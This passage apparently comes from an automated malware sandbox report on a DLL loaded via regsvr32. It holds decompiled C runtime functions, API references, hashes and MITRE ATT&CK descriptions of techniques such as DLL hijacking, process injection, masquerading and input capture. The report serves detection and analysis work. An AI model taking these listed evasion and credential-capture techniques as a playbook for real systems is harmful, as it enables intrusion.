							if(__eflags <= 0) {
								L11:
								_t17 = E73216F05(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E73215B5D(GetLastError());
									_t19 =  *((intOrPtr*)(E73215B93(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E7321634D(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E73215B5D(GetLastError());
						return  *((intOrPtr*)(E73215B93(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E7321634D(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E73216333(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 73216333: _free.LIBCMT ref: 73216341

Part of subcall function 73216F05: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,73218EE7,?,00000000,00000000), ref: 73216FA7

GetLastError.KERNEL32 ref: 73215D6F
__dosmaperr.LIBCMT ref: 73215D76
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 73215DB5
__dosmaperr.LIBCMT ref: 73215DBC

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3095ae09c3ed2b61b0d041e016bf4a8f711f321e960ae33244da651185a01d7d
Instruction ID: bae293188863d15f66cce4d775f717a0677ad0a13d8226e4ecd3368ca874bcd1
Opcode Fuzzy Hash: 3095ae09c3ed2b61b0d041e016bf4a8f711f321e960ae33244da651185a01d7d
Instruction Fuzzy Hash: 3E21D8F150030BAFE7115FB98E88F1BB7EDEF012647348554E92993190D771ECA047A0

Uniqueness

Uniqueness Score: -1.00%

Function 73215603, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E73215603(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x73231050; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E73217580(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E73215BA6(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E73217580(__eflags,  *0x73231050, _t51);
							if(__eflags != 0) {
								E73215401(_t51, 0x7323224c);
								E73215C03(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E73217580(__eflags,  *0x73231050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E73217580(0,  *0x73231050, 0);
							_push(0);
							L9:
							E73215C03();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E73217541(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x73231050; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E73215108(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x73231050; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E73217580(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E73215BA6(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E73217580(__eflags,  *0x73231050, _t60);
								if(__eflags != 0) {
									E73215401(_t60, 0x7323224c);
									E73215C03(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E73217580(__eflags,  *0x73231050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E73217580(__eflags,  *0x73231050, _t20);
								_push(_t60);
								L25:
								E73215C03();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E73217541(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x73231050; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E73215108(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x73231050; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E73217580(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E73215BA6(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E73217580(__eflags,  *0x73231050, _t54);
											if(__eflags != 0) {
												E73215401(_t54, 0x7323224c);
												E73215C03(0);
												goto L45;
											} else {
												_t40 = 0;
												E73217580(__eflags,  *0x73231050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E73217580(0,  *0x73231050, 0);
											_push(0);
											L41:
											E73215C03();
											goto L36;
										}
									}
								} else {
									_t54 = E73217541(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x73231050; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,732198E5,00000000,00000001,73217CF5,?,73219DA2,00000001,?,?,?,73217C8E,?,00000000), ref: 73215608
_free.LIBCMT ref: 73215665
_free.LIBCMT ref: 7321569B
SetLastError.KERNEL32(00000000,00000007,000000FF,?,73219DA2,00000001,?,?,?,73217C8E,?,00000000,00000000,7322FCF8,0000002C,73217CF5), ref: 732156A6

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8ac9ee29eefb121a060dc170babab2f9865073794c43b49b8743ee98bc0fe821
Instruction ID: 485b30e87c0850f78bbd70b98fa3a44a2ac3675590278c9ec929abf7b34815c5
Opcode Fuzzy Hash: 8ac9ee29eefb121a060dc170babab2f9865073794c43b49b8743ee98bc0fe821
Instruction Fuzzy Hash: 0011A3F33246437BE701366E4F84F5B22EA9BC16B47390274F929921D4EEB59CE15190

Uniqueness

Uniqueness Score: -1.00%

Function 7321575A, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E7321575A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x73231050; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E73217580(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E73215BA6(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E73217580(__eflags,  *0x73231050, _t18);
							if(__eflags != 0) {
								E73215401(_t18, 0x7323224c);
								E73215C03(0);
								goto L13;
							} else {
								_t13 = 0;
								E73217580(__eflags,  *0x73231050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E73217580(0,  *0x73231050, 0);
							_push(0);
							L9:
							E73215C03();
							goto L4;
						}
					}
				} else {
					_t18 = E73217541(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x73231050; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(?,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 7321575F
_free.LIBCMT ref: 732157BC
_free.LIBCMT ref: 732157F2
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 732157FD

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 29942ed74ac86191354bac21fa0710fcc31257694b6595bb4bf2f4a8561f990f
Instruction ID: fa57bb85a6dd027a60f8dadb92629a4b59a8d7925d93e8651dacac8f88d53c99
Opcode Fuzzy Hash: 29942ed74ac86191354bac21fa0710fcc31257694b6595bb4bf2f4a8561f990f
Instruction Fuzzy Hash: 1711C2B3304703BBE301367F8F85F6B26EA9BC16B57340274F929961C4EEB59CA25110

Uniqueness

Uniqueness Score: -1.00%

Function 7321AAE6, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321AAE6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x73231850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E7321AACF();
					E7321AA91();
					_t13 = WriteConsoleW( *0x73231850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x7321ab03
0x7321ab07
0x7321ab14
0x7321ab19
0x7321ab34
0x7321ab34
0x7321ab3a

APIs

WriteConsoleW.KERNEL32(?,?,73217CF5,00000000,?,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001), ref: 7321AAFD
GetLastError.KERNEL32(?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000,00000001,?,73219DC6,73217C8E), ref: 7321AB09

Part of subcall function 7321AACF: CloseHandle.KERNEL32(FFFFFFFE,7321AB19,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000,00000001), ref: 7321AADF

___initconout.LIBCMT ref: 7321AB19

Part of subcall function 7321AA91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7321AAC0,7321A532,00000001,?,73219872,00000000,00000000,00000001,00000000), ref: 7321AAA4

WriteConsoleW.KERNEL32(?,?,73217CF5,00000000,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000), ref: 7321AB2E

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b966a959f059bbbc9fb4e3bbe03daa46b033923c34f5e4ca2087562caff40691
Instruction ID: 439e2348dd358172e32aa0383308b169d5453709eaeb08503ff1cfa01bedd7bd
Opcode Fuzzy Hash: b966a959f059bbbc9fb4e3bbe03daa46b033923c34f5e4ca2087562caff40691
Instruction Fuzzy Hash: F0F0FE37100256BBDB523E928E08B9A3FA7EB083A0B158014FA1D86110CA319960AB94

Uniqueness

Uniqueness Score: -1.00%

Function 73214F51, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73214F51() {

				E73215C03( *0x73232258);
				 *0x73232258 = 0;
				E73215C03( *0x7323225c);
				 *0x7323225c = 0;
				E73215C03( *0x73231f3c);
				 *0x73231f3c = 0;
				E73215C03( *0x73231f40);
				 *0x73231f40 = 0;
				return 1;
			}

0x73214f5a
0x73214f67
0x73214f6d
0x73214f78
0x73214f7e
0x73214f89
0x73214f8f
0x73214f97
0x73214fa0

APIs

_free.LIBCMT ref: 73214F5A

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 73214F6D
_free.LIBCMT ref: 73214F7E
_free.LIBCMT ref: 73214F8F

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93f71f062329a4e36a463759a2b1c308de00f02f9668b3c30153e8f4b4c14111
Instruction ID: 249ac66c09f4bc4599a0a5914fed0f90062cf2396b55f65889f15c7f2850ca16
Opcode Fuzzy Hash: 93f71f062329a4e36a463759a2b1c308de00f02f9668b3c30153e8f4b4c14111
Instruction Fuzzy Hash: 51E04FBB6147689BD7017F1BE90878A7B65BB84A00331C086E40802211CBB511A7BF81

Uniqueness

Uniqueness Score: -1.00%

Function 73214850, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E73214850(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E73216B2E(_t48);
						E7321657B(_t48, _t57, 0, 0x73231c98, 0, 0x73231c98, 0x104);
						_t26 =  *0x73231f44; // 0x2d13388
						 *0x73231f34 = 0x73231c98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x73231c98;
							_v20 = 0x73231c98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E73214B01(E73214988( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E73214988( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E7321646E(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x73231f38 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x73231f3c = _t58;
											L18:
											E73215C03(_t37);
											_v12 = 0;
											L19:
											E73215C03(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x73231f38 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x73231f3c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E73215B93(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E73215B93(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E73215AD6();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 73214893, 7321489A, 732148D0

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 33abfcff847d8fe418ee59b211e83736f9e2f9af04aa322556d926448ecc295e
Instruction ID: 918f6bdee92f417d1ca78650bfa9f9c2cfce3e1797de28f837b41096f555eb15
Opcode Fuzzy Hash: 33abfcff847d8fe418ee59b211e83736f9e2f9af04aa322556d926448ecc295e
Instruction Fuzzy Hash: 2141A971A1432BAFD711DF99DE80B9EB7FCEF85310F254066E40997240E7B09A90C790

Uniqueness

Uniqueness Score: -1.00%

Function 732175C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E732175C2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t11;

				_t11 = E732173E1(0x12, "InitializeCriticalSectionEx", 0x7321e478, "InitializeCriticalSectionEx");
				if(_t11 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				 *0x7321d104(_a4, _a8, _a12);
				return  *_t11();
			}

0x732175de
0x732175e5
0x00000000
0x73217602
0x732175f2
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 73217602

Strings

InitializeCriticalSectionEx, xrefs: 732175C8, 732175D2
D2!s, xrefs: 732175F2

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: D2!s$InitializeCriticalSectionEx
API String ID: 2593887523-708662677
Opcode ID: 9dbf9d90e2a1cdfeee1f63889d839fcc29b875cded1c1ad0544cd18b035e55cc
Instruction ID: 50339139ff6adaa19e98ae482403c4dd0b2933048610b6998c1e3cc615f05022
Opcode Fuzzy Hash: 9dbf9d90e2a1cdfeee1f63889d839fcc29b875cded1c1ad0544cd18b035e55cc
Instruction Fuzzy Hash: ACE0923254015ABBDB023E95CE08FDE3FA5DB44761F008120FD6919111CB3149B0FAD0

Uniqueness

Uniqueness Score: -1.00%

Function 732174C3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E732174C3(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t7;

				_t7 = E732173E1(3, "FlsAlloc", 0x7321e42c, "FlsAlloc");
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x7321d104(_a4);
				return  *_t7();
			}

0x732174df
0x732174e6
0x00000000
0x732174f7
0x732174ed
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 732174F7

Strings

FlsAlloc, xrefs: 732174C9, 732174D3
D2!s, xrefs: 732174ED

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: D2!s$FlsAlloc
API String ID: 2773662609-1107392031
Opcode ID: 1bb505dd20ecc9407afbe592e0da966cb5e93dd30af256c42add5a2a050d23bf
Instruction ID: 50ec555fe7277b19ad7e78c33d1bde16fceaf8227e2d80439f8579c7cb2cbade
Opcode Fuzzy Hash: 1bb505dd20ecc9407afbe592e0da966cb5e93dd30af256c42add5a2a050d23bf
Instruction Fuzzy Hash: 0DE0C233641127BBC202329A6F08BAE7ED4CB90764B408110FD996A102CF640CF1A9E6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

